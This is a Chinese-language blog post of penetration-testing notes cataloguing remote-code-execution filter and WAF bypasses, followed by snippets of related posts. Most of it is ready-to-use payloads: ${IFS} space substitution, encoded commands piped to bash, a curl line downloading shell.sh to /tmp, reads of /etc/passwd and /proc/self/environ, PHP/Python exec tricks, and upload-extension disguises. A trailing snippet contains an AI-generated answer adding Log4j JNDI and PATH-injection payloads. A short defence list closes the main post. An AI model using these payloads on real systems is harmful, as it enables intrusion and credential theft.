RCE绕过技巧大全

已于 2024-12-11 14:48:09 修改
阅读量1.1k 收藏 26
点赞数 8
分类专栏: 渗透测试笔记 文章标签: chrome 前端 rce 渗透测试 绕过 bash js
于 2024-12-11 14:47:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_19623861/article/details/144400922
版权

远程代码执行(RCE)漏洞是一种严重的安全威胁,允许攻击者在受害者的服务器上执行任意命令。在实际渗透测试和攻击过程中,WAF(Web应用防火墙)或漏洞的某些限制可能需要使用各种绕过技巧。以下是常见的 RCE 绕过技术分类和示例。

文章目录

1. 基础绕过技术

1.1 空格替代

空格是常见的分隔符,很多防护机制会限制空格,可以用以下方法替代:

常见替代符号:

${IFS}    # Bash 的内置分隔符
%09       # URL 编码的 Tab 字符
+         # URL 编码的空格(部分场景)

示例:

curl${IFS}-o${IFS}/tmp/shell http://example.com/shell.sh

路径截断: 替换 / 为 // 或 ./:

/bin/sh => //bin/sh => ./bin/sh

1.2 命令连接符

将多个命令组合在一起,以绕过某些简单的过滤:

;(分号):执行多个命令。
&&:前一命令成功时执行后一命令。
||:前一命令失败时执行后一命令。
|(管道):将前一命令的输出传递给下一命令。
示例:

cat /etc/passwd;ls

2. 字符编码绕过

2.1 URL 编码

将命令用 URL 编码后绕过过滤机制:

cat%20/etc/passwd

2.2 双字节编码

某些过滤规则可能对单字节敏感,使用双字节编码可以绕过:

%c0%ae%c0%ae/ (双字节表示 ../)

2.3 Base64 编码

通过 Base64 编码传递 payload,再解码执行:

echo cHl0aG9uIC1jICdpbXBvcnQgc3VicHJvY2VzOyBzdWJwcm9jZXNzLnJ1bigiL2Jpbi9zaCIsImN1cmwgL3NvbWUvdXJsIikn | base64 -d | bash

2.4 Unicode 编码

将命令部分替换为 Unicode 编码绕过检测:

\u002fbin\u002fsh

3. 符号混淆绕过

3.1 字符拆分

将关键字用字符串拼接或环境变量替换:

/bin/ba${PATH:2:1}sh

3.2 混淆关键命令

将关键命令分解为动态变量或使用其他等效命令:

export CMD=cat; $CMD /etc/passwd

4. 特殊路径与命令利用

4.1 环境变量利用

利用常见环境变量执行命令:

${PATH}:搜索可执行文件的路径。
${HOME}:用户的主目录。
示例:

$PATH/bin/sh

4.2 短命令调用

使用短命令或别名绕过:

curl => wget => lwp-download

4.3 利用 /proc 文件系统

在 Linux 上通过 /proc 文件系统访问系统资源:

cat /proc/self/environ

5. 输入限制绕过

5.1 添加噪声字符

在 payload 中加入无害字符绕过简单规则:

cat /etc/passwd |#注释
ls

5.2 分块执行

将命令分成多部分执行:

e=cat; $e /etc/passwd

6. 常见 WAF 绕过技巧

6.1 命令关键字变形

替换命令中的敏感关键字:

c%61t /etc/passwd

6.2 字符替换

利用不同编码或替代方案:

bash -c "ls"
=> b%s%68 -c "ls" (变形)

6.3 多重编码

将 payload 编码多次绕过深度检查:

curl%2520http://example.com

7. 基于语言的特定绕过

7.1 PHP

使用动态函数绕过:

<?php
$cmd = "cat /etc/passwd";
call_user_func("system", $cmd);
?>

短标签与拼接:

<?=`ls`; ?>

7.2 Python

利用 eval:

eval("__import__('os').system('cat /etc/passwd')")

混淆:

import os
getattr(os, 'sy' + 'stem')('ls')

7.3 Java

通过 Runtime 调用系统命令:

Runtime.getRuntime().exec("ls");

8. 文件上传与 RCE 结合绕过

8.1 文件名伪装

上传后门文件时,伪装文件扩展名:

.php.jpg
.phtml

8.2 命令拼接

通过文件名触发命令:

example.php;cat /etc/passwd

8.3 双文件解析

某些服务器会解析两个扩展名:

shell.php.txt

9. 综合案例

9.1 简单 PHP RCE 绕过

http://example.com/index.php?cmd=cat${IFS}/etc/passwd

9.2 Base64 编码传递

http://example.com/index.php?cmd=echo${IFS}d2hvYW1pCg==|base64${IFS}-d

9.3 WAF 加强环境

通过动态生成:

http://example.com/index.php?cmd=$({echo,cat})${IFS}/etc/passwd

10. 常见防御措施

  • 输入验证: 使用白名单策略严格限制输入。
  • 命令过滤: 过滤关键系统命令(如 cat, ls)。
  • Web 应用防火墙(WAF): 添加多层防护规则。
  • 最小化权限: 降低 Web 服务用户的权限,防止命令被滥用。
  • 以上为 RCE 绕过的常见方法及案例,应结合实际场景与工具进行测试,同时加强目标环境的防护措施以防止漏洞被恶意利用。
漏洞利用之WAF绕过
Mr_helloword的博客
09-07 1140
命令执行WAF绕过 1.通配符 符号 含义 ? 匹配单个字符如果匹配多个字符,就需要多个?连用 * *代表任意数量的字符 [ ] 代表一定有一个在括号内的字符(非任意字符)。例如 [abcd] 代表一定有一个字符, 可能是 a, b, c, d 这四个任何一个 利用通配符执行以下命令: ls -l 使用通配符 /?in/?s -l 读取/etc/passwd: /???/??t /??c/p???w? 有时候WAF不允许使用太多的?号 /?in/cat /?tc/p?sswd
RCE:命令注入 过滤空格 远程代码执行 php://input 读取源代码
qq_69100706的博客
08-12 985
命令注入是一种常见的技巧,用于实现远程代码执行(RCE)。命令注入发生在Web应用或服务接受用户输入并将其用于执行操作系统命令的场景中,如果用户输入未被妥善清理或验证,攻击者可以注入额外的命令,从而执行任意代码。
log4j RCE waf 绕过技巧
weixin_50464560的博客
07-09 1991
log4j waf 绕过技巧 - ph4nt0mer - 博客园 (cnblogs.com)原来的poc: Copy绕过的poc: Copy可行 Copy不一定可行 Copy可行unico字符串下列表达式均等价于abc: Copylog4j poc集合 https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis● 不出现port,避免被waf匹配ip:port Copy
WAF绕过-注入上传RCE利用绕过思路
告白的博客
08-28 693
0x00 简介 当我对对象检测,已经检测到存在sql注入,文件上传或者RCE等漏洞的时候,发现验证漏洞的存在,被waf拦截,无法验证漏洞,这里总结sqlmap的注入绕过,xss工具使用的绕过,文件上传的思路,以及RCE命令执行的命令写法绕过safedog,BT,aliyun 0x01 绕过思路 1)sqlmap绕过思路 cc绕过: cc绕过:使用代理扫描:--proxy="http://代理IP:端口" payload变异绕过思路: 指的是当我们以及确定存在注入,我们尝试去手工注入验证查看回显时候,输入
RCE攻击绕过WAF详解
永远是少年
04-03 2975
今天继续给大家介绍渗透测试相关知识,本文主要内容是RCE攻击绕过WAF详解。 一、WAF拦截RCE攻击 二、利用编码和解码方式绕过WAF 三、利用替换和拼接绕过WAF 四、另类上传方式绕过WAF 五、写在最后
RCE漏洞详解及绕过总结(全面)
永不落的梦想
07-10 2万+
包括RCE漏洞的原理,常见的造成RCE漏洞的函数解析,以及限制绕过的各种姿势
RCE(远程命令执行)绕过总结
Elite的博客
04-18 5541
常见的RCE(远程命令执行)漏洞绕过方法,及原理讲解,干货满满!
命令执行RCE及其绕过详细总结(各情景下的绕过
2301_76690905的博客
12-12 1万+
scandir() :将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组,其中包含当前目录下的所有文件和目录名称(glob()可替换)localeconv() :返回一包含本地数字及货币格式信息的数组。(但是这里数组第一项就是‘.’,这个.的用处很大)current() :返回数组中的单元,默认取第一个值。pos()和current()是同一个东西getcwd() :取得当前工作目录dirname():函数返回路径中的目录部分。
总结rce(远程代码执行各种sao姿势)绕过bypass
A10ng_的博客
07-17 1万+
空格绕过: 在bash下可以用$IFS、${IFS}、$IFS$9、%09、<、>、<>、{,}(例如{cat,/etc/passwd} )、%20(space)、%09(tab),这儿跟sql注入有点相似,用/**/注释也能绕过。 命令执行函数system()绕过(在URL请求中过滤system()函数) 系统命令函数system() passthru() exec() shell_exec() popen() proc_open() pcntl_exec() 反..
PHP-RCE绕过的姿势总结
有时候,想要一块二向箔
02-18 1万+
一、命令执行空格过滤取反绕过命令分隔符黑名单绕过(比如flag字符)拼接二、代码执行总结参考文章 前言 做了很多的题目,静下心来学习大佬做点小总结 一、命令执行 空格过滤 < 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 取反绕过 取反两次就可以得到想要绕过限制的数据 传参时 ?code=(~%8F%97%8F%96%91%99%90)(); 在做NSS平台上的一道rce题目就是用到类似的思路,
近两年常用的RCE漏洞收集
Websec
04-11 5729
1、Spring Cloud RCE CVE-2022-22965 https://github.com/fullhunt/spring4shell-scan log4j漏洞: https://github.com/fullhunt/log4j-scan/blob/master/log4j-scan.py 2、weblogic反序列化 WeblogicScan:https://github.com/rabbitmask/WeblogicScan 3、shiro反序列化 shiroExploit:https:
RCE漏洞之绕过
h0ld1rs的博客
10-27 6286
文章目录花括号斜杠空格过滤一些命令分隔符黑名单绕过拼接绕过编码绕过单引号和双引号绕过利用Shell 特殊变量绕过linux中直接查看文件内容的工具文件构造 花括号 {} 在Linux bash中还可以使用{OS_COMMAND,ARGUMENT}来执行系统命令 {cat,flag} 斜杠 路径 / \是在正则等语法里面,表示后面跟的字符是正常字符,不需要转义。 也就意味着,我们可以在rce漏洞,过滤掉cat ls等命令时候,直接使用ca\t来实现绕过 空格过滤 < 、<>、%20(spac
CTF命令执行及绕过技巧
热门推荐
JBlock的博客
03-07 2万+
前言 今天是代码审计部分的一个技巧补充!前些阵子做了sql注入回顾篇系列!今天开启php代码审计系列! 今天内容主要是CTF中命令注入及绕过的一些技巧!以及构成RCE的一些情景! 文章目录前言正文代码执行代码执行的几种方式命令执行常见命令执行函数绕过姿势敏感字符绕过处理无回显的命令执行Think one Think 正文 在详细介绍命令注入之前,有一点需要注意:命令注入与远程代码执行不同。他们的区...
CTFHUB-RCE通关记录以及常见的绕过过滤的方法
不想当脚本小子的脚本小子
03-21 2359
先过关,再分析相关的防御源代码 1.过滤cat 然后cat 301472130920273.php然后查看网页源代码即可得到flag 2.过滤cat 根据题目要求过滤了cat 而该服务器为Linux系统区分大小写 就无法通过大小写来绕过 本来想使用vi命令替换cat命令也能查看到flag中的内容 但是失败了 最后用了替换法:127.0.0.0 ; $a=ca;$b=t; $a$b flagxxxx 题目源码: <?php $res = FALSE; if (is.
CTFHub_技能树_Web之RCE——“过滤空格”
Ho1aAs‘s Blog
07-28 1053
文章目录使用工具解题过程完 –>CTFHub传送门<– 使用工具 Microsoft Edge v84.0.522.40 解题过程 查看网页显示的源码,和之前的一样,只是过滤了空格 空格的表示方法 cat<file cat<>file cat${IFS}file 先查询 后打开 注意:FLAG藏在注释里,不是明文表示 完 欢迎在评论区留言 感谢浏览 ...
WAF绕过-漏洞利用之注入上传跨站等绕过
xhscxj的博客
02-22 1984
waf主要拦截的就是上图漏洞 SQL 注入 如需 sqlmap 注入 修改 us 头及加入代理防 CC 拦截自写 tamper 模块 安全狗:参考之前 payload Aliyun:基本修改指纹即可 宝塔:匹配关键字外加/*等 sqlmap --proxy="http://127.0.0.1:8080" --tamper="waf.py" --random-agent #文件上传 1.php 截断 参考前面上传 waf 绕过 payload #XSS 跨站 利用 XSStrike 绕过 加上--tim.
RCE绕过宝塔WAF(php)
weixin_43916797的博客
07-11 1409
1.参数bin2hex加密,例如phpinfo(): 编写脚本得到加密后的数据:706870696e666f28293b <?php $str = "phpinfo();"; $hex = bin2hex($str); echo($hex) ?> url的参数为:www.xx.com?x=hex=′706870696e666f28293b′;assert(pack("H∗",hex='706870696e666f28293b';assert(pack("H*",hex=′706870696e6
CTF中字符长度限制下的命令执行 rce(7字符5字符4字符)汇总
Love&Share
10-21 2万+
七字符rce 源码 <?php highlight_file(__FILE__); if(strlen($_GET[1]<7)){ echo strlen($_GET[1]); echo '<hr/>'; echo shell_exec($_GET[1]); }else{ exit('too long'); } ?> #写入语句 <?php eval($_GET[1]); #base64编码后 PD9waHAgZXZhbCgkX0dFV
使用kali破解WIFI——Aircrack-ng
渗透测试
06-08 2万+
文章目录前言一、配置网卡1.查看网卡名2.设置监听模式二、获取目标流量1.扫描附近wifi2.监听目标流量三、破解wifi密码1.攻击指定客户端2.暴力破解总结 前言 Aircrack-ng是kali linux自带的网络测试工具之一,是评估WIFI网络安全性的一整套工具。 它侧重于WIFI安全的不同领域: 监控:数据包捕获和数据导出到文本文件,以供第三方工具进一步处理 攻击:通过数据包注入重播攻击,解除身份验证,虚假接入点等 测试:检查WIFI卡和驱动程序功能(捕获和注入) 破解:WEP和WPA PS
rce绕过关键字
最新发布
04-03
<think>嗯,用户想了解RCE漏洞绕过的方法和关键技术点。首先,我需要回忆一下RCE的基本概念。RCE是远程代码执行,攻击者能够在目标系统上执行任意代码,危害极大。用户提到的绕过可能是指绕过现有的防御措施,比如WAF、输入过滤或者沙箱环境。 首先,我得考虑常见的绕过技术。比如,命令注入中的特殊字符绕过,像分号、管道符、反引号这些。有时候,黑名单过滤不完善,可以用编码或替换字符的方式绕过。比如,用十六进制编码或者Base64编码命令,然后解码执行。 然后,用户提供的引用里有提到CVE-2024-0012,是关于身份认证绕过导致RCE的案例。这可能涉及权限提升或认证机制中的漏洞,比如利用会话管理的问题或者Cookie篡改。另外,引用3提到Log4j漏洞,涉及JNDI注入,这类漏洞利用特定的协议或服务来触发,绕过检测可能需要混淆payload,比如使用非常规的协议格式或拆分攻击字符串。 还需要考虑上下文,比如输入验证的漏洞。如果应用对用户输入处理不当,未正确转义或过滤,攻击者可能通过构造特殊输入注入恶意代码。例如,在SQL注入中,使用注释符或大小写混合绕过,类似的方法可能适用于RCE绕过。 另外,环境变量注入也是一种可能。比如,通过控制环境变量参数来执行命令,某些程序可能会信任特定的环境变量,从而导致代码执行。还有,利用动态代码执行函数,如PHP的eval,Python的exec,如果用户输入直接传递给这些函数,没有严格过滤,就会导致RCE。 还有,框架或库的漏洞,比如旧版本的库存在已知漏洞,攻击者可以利用这些未修补的漏洞执行代码。例如,Apache Struts的漏洞曾被广泛利用。 现在要结合用户提供的引用,引用1提到代码审计和静态分析,所以在绕过时可能需要找到代码审计中的疏漏,比如未覆盖的边缘情况。引用2中的认证绕过导致RCE,说明权限提升或绕过认证步骤是关键。引用3中的Log4j漏洞检测被WAF拦截,所以绕过WAF可能需要混淆技术。 总结下来,RCE绕过的方法可能包括:命令注入绕过过滤、利用编码或混淆、认证/授权绕过、框架漏洞利用、上下文敏感攻击(如模板注入)、以及利用信任机制漏洞。 需要确保回答结构清晰,分点说明,每个技术点给出例子,并引用提供的资料。比如,在认证绕过部分引用CVE-2024-0012的例子,在Log4j部分提到引用3的检测方法。 还要注意用户要求使用中文,LaTeX格式的数学表达式,但这个问题可能不太涉及数学公式,所以可能不需要太多数学内容。但如果有涉及变量或代码部分,需要用行内格式,比如$command$。 最后生成相关问题,要围绕RCE绕过的扩展,比如防御措施、特定漏洞分析、检测技术等。</think>### RCE漏洞绕过方法及关键技术点分析 #### 一、常见RCE漏洞绕过方法 1. **命令注入绕过** - **特殊字符替换**:利用黑名单未覆盖的符号(如`$()`、`%0a`、反引号)拼接命令,例如: ```bash # 原始命令:cat /etc/passwd # 绕过形式:c'a't /et$@c/pass''wd ``` - **编码转换**:使用Base64、十六进制或URL编码混淆命令,例如: ```bash echo "bHM=" | base64 -d | sh # 解码后执行"ls" ``` 2. **输入过滤绕过** - **多级嵌套解析**:利用应用层协议(如HTTP参数污染、JSON/XML解析差异)注入恶意代码[^3]。 - **上下文敏感攻击**:在模板注入(SSTI)中,通过构造`${"".getClass().forName("...")}`绕过沙箱限制。 3. **认证/授权绕过** - **会话伪造**:通过Cookie篡改或JWT令牌伪造绕过身份验证(如CVE-2024-0012中的Web界面认证绕过)[^2]。 - **路径遍历**:利用未校验的路径参数访问敏感接口,例如`/admin/../api/exec?cmd=id`。 4. **框架/库漏洞利用** - **动态加载漏洞**:如Log4j的JNDI注入(`${jndi:ldap://attacker.com/exp}`),通过DNS查询混淆绕过WAF检测。 - **反序列化漏洞**:利用Java/Python的反序列化机制触发恶意代码,例如Apache Commons Collections的Gadget链。 #### 二、关键技术点 1. **漏洞链组合** 通过多个漏洞串联实现绕过,例如: - 先绕过认证(CVE-2024-0012)→ 再利用权限提升漏洞(CVE-2024-9474)→ 最终执行任意命令[^2]。 $$ \text{RCE} = \text{认证绕过} \oplus \text{权限提升} \oplus \text{命令执行} $$ 2. **环境依赖利用** 利用目标系统环境变量或依赖库的缺陷,例如: ```bash # 注入环境变量实现命令执行 curl http://target.com/api?input=;export PATH=/tmp:$PATH;malicious-bin ``` 3. **混淆与逃逸技术** - **WAF绕过**:通过分块传输、注释插入或Unicode编码绕过正则匹配,例如: ```http POST /api HTTP/1.1 Transfer-Encoding: chunked 3; x=x\r\ncmd\r\n0\r\n\r\n ``` - **代码混淆**:在PHP中使用`${_GET['a']}`动态调用函数,避免直接出现敏感关键词。 #### 三、防御建议 1. **输入严格校验**:使用白名单机制限制字符集,例如仅允许`[a-zA-Z0-9_]`。 2. **沙箱隔离**:对动态代码执行操作进行资源隔离(如Docker容器)。 3. **依赖库更新**:定期升级框架/库版本(如Log4j升级到2.17.0+)。 4. **纵深防御**:结合WAF、RASP(运行时应用自保护)和代码审计[^1]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我重来不说话

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值